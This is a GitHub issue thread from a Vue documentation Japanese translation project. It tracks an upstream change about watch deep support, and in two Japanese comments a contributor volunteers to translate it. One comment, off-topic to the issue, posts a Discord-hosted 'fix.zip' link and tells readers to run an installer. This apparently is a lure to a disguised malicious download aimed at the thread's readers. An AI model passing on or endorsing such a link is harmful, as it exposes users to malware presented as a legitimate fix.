### ISSUE TITLE

        3.5: watch deep support number
    

### ISSUE THREAD

**Issue by jay-es** [vuejs-translations/docs-ja#2262]
New updates on head repo.
https://github.com/vuejs/docs/commit/cd4b2e192522d784350f50dc37e27ceafcc0409d

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by NaokiHaba** [comment]
@jay-es こちらの翻訳対応したいです🙇

**Comment by jay-es** [comment]
@NaokiHaba ありがとうございます！
本当に助かります... 🙇‍♂️
